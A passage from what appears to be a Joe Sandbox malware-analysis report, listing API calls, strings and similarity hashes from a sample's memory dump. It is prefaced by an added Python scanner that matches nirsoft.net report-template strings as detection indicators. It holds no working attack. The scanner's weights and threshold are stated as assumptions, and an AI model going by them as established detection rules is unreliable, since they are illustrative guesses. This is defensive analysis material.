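The three function blocks above list, in their String ID fields, the wide-character strings of the nirsoft.net HTML report template, the Windows shell-folder names, and the \systemroot prefix (compared with _memicmp alongside GetWindowsDirectoryW). The scanner below is an added example and is not part of the Joe Sandbox report or of the analysed sample: it takes those String ID values verbatim, splits them on the `$` that Joe Sandbox uses as separator, and searches a byte buffer for their UTF-16LE encodings, since the functions handle them through wcscpy and _snwprintf and they are therefore wide in memory. The scoring weights, the threshold, the function names and the sample buffer are assumptions made for illustration, not anything the report states.

```python
"""
Added example (not part of the Joe Sandbox report): scan a memory dump for the
wide-character indicator strings listed in the report's "String ID" fields.
Weights, threshold and the sample buffer are assumptions made for illustration.
"""
from __future__ import annotations

from dataclasses import dataclass

# Copied verbatim from the report's "String ID" fields.  Joe Sandbox joins the
# individual strings of one function with '$'.
NIRSOFT_REPORT_STRING_ID = (
    '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">'
    '$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>'
    "$<meta http-equiv='content-type' content='text/html;charset=%s'>"
    '$<table dir="rtl"><tr><td>'
)
SHELL_FOLDER_STRING_ID = (
    "AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup"
    "$Desktop$Favorites$Programs$Start Menu$Startup"
)
SYSTEMROOT_STRING_ID = "\\systemroot"

STRONG_THRESHOLD = 2  # assumed: two distinct template strings is enough to call it


def split_string_id(string_id: str) -> list[str]:
    """Split a Joe Sandbox "String ID" value into its strings.

    '$' is the report's separator, so a literal '$' inside a string is
    indistinguishable from a boundary; none of the strings used here has one.
    """
    return [s for s in string_id.split("$") if s]


@dataclass(frozen=True)
class Hit:
    indicator: str
    offset: int


def find_wide_strings(buf: bytes, needles: list[str], case_insensitive: bool = False) -> list[Hit]:
    """Report every occurrence of each needle encoded as UTF-16LE.

    The functions use wcscpy/_snwprintf, so these strings are wide in memory.
    Case-insensitive mode (for '\\systemroot', which the code compares with
    _memicmp) lowercases both sides with bytes.lower(): that folds only ASCII
    bytes, which is exact for ASCII text in UTF-16LE and keeps offsets intact,
    but it also folds the low byte of a non-ASCII code unit, so a hit that sits
    next to non-ASCII text deserves a second look.
    """
    hay = buf.lower() if case_insensitive else buf
    hits: list[Hit] = []
    for needle in needles:
        enc = (needle.lower() if case_insensitive else needle).encode("utf-16-le")
        pos = hay.find(enc)
        while pos != -1:
            hits.append(Hit(needle, pos))
            pos = hay.find(enc, pos + len(enc))
    return hits


def classify(buf: bytes) -> dict:
    """Score a buffer: the nirsoft.net report template is the strong indicator;
    the shell-folder names are ordinary Windows strings and only corroborate."""
    template = find_wide_strings(buf, split_string_id(NIRSOFT_REPORT_STRING_ID))
    folders = find_wide_strings(buf, split_string_id(SHELL_FOLDER_STRING_ID))
    sysroot = find_wide_strings(buf, [SYSTEMROOT_STRING_ID], case_insensitive=True)
    distinct_template = {h.indicator for h in template}
    distinct_folders = {h.indicator for h in folders}
    return {
        "score": 10 * len(distinct_template) + len(distinct_folders),
        "nirsoft_report_writer": len(distinct_template) >= STRONG_THRESHOLD,
        "template_strings": sorted(distinct_template),
        "shell_folders": sorted(distinct_folders),
        "systemroot_offsets": [h.offset for h in sysroot],
    }


def build_sample_dump() -> bytes:
    """Constructed stand-in for a process memory dump (not a real capture)."""
    return b"".join([
        b"\x00" * 64,
        '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">'.encode("utf-16-le"),
        b"\x90" * 16,
        '<table dir="rtl"><tr><td>'.encode("utf-16-le"),
        "\\SystemRoot\\System32\\drivers".encode("utf-16-le"),  # mixed case
        "Common Startup".encode("utf-16-le"),                    # also contains "Startup"
        b"narrow ASCII text must not match: Desktop",            # not wide
    ])


if __name__ == "__main__":
    for key, value in classify(build_sample_dump()).items():
        print(f"{key}: {value}")
```

Run it against a real dump by passing the file's bytes to `classify`; the Source File names above identify the dumps the report's own listing was produced from. The shell-folder names alone never trigger the verdict, because any process that calls SHGetFolderPath-style APIs carries them; only the nirsoft.net template strings do.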
APIs
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
• String ID: 0$6
• API String ID: 4066108131-3849865405
• Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
• Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
• Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
• Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
APIs
• memset.MSVCRT ref: 004082EF
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
• memset.MSVCRT ref: 00408362
• memset.MSVCRT ref: 00408377
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$ByteCharMultiWide
• String ID:
• API String ID: 290601579-0
• Opcode ID: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
• Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
• Opcode Fuzzy Hash: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
• Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
APIs
• memchr.MSVCRT ref: 00444EBF
• memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
• memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
• memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
• memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
• memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
• memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
• memset.MSVCRT ref: 0044505E
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpy$memchrmemset
• String ID: PD$PD
• API String ID: 1581201632-2312785699
• Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
• Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
• Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
• Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
APIs
• GetSystemMetrics.USER32(00000011), ref: 00409F5B
• GetSystemMetrics.USER32(00000010), ref: 00409F61
• GetDC.USER32(00000000), ref: 00409F6E
• GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
• ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
• GetWindowRect.USER32(?,?), ref: 00409FA0
• GetParent.USER32(?), ref: 00409FA5
• GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
• String ID:
• API String ID: 2163313125-0
• Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
• Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
• Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
• Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
APIs
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: free$wcslen
• String ID:
• API String ID: 3592753638-3916222277
• Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
• Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
• Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
• Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                    • String ID: %s (%s)$YV@
                                                                                                                                                                                    • API String ID: 3979103747-598926743
                                                                                                                                                                                    • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                    • API String ID: 2767993716-572158859
                                                                                                                                                                                    • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                                                                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                                                                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                    • API String ID: 3176057301-2039793938
                                                                                                                                                                                    • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                                                                                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                                                                                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                    • database is already attached, xrefs: 0042F721
                                                                                                                                                                                    • out of memory, xrefs: 0042F865
                                                                                                                                                                                    • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                                                                                                    • Opcode ID: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                                                                                                                                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                                                                                                    • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                                                                                                    • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                    • String ID: ($d
                                                                                                                                                                                    • API String ID: 1140211610-1915259565
                                                                                                                                                                                    • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                                                                                    • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                    • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                                                                                    • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3015003838-0
                                                                                                                                                                                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                    • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 59245283-0
                                                                                                                                                                                    • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                                                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                    • free.MSVCRT ref: 004185AC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2802642348-0
                                                                                                                                                                                    • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                    • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                    • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
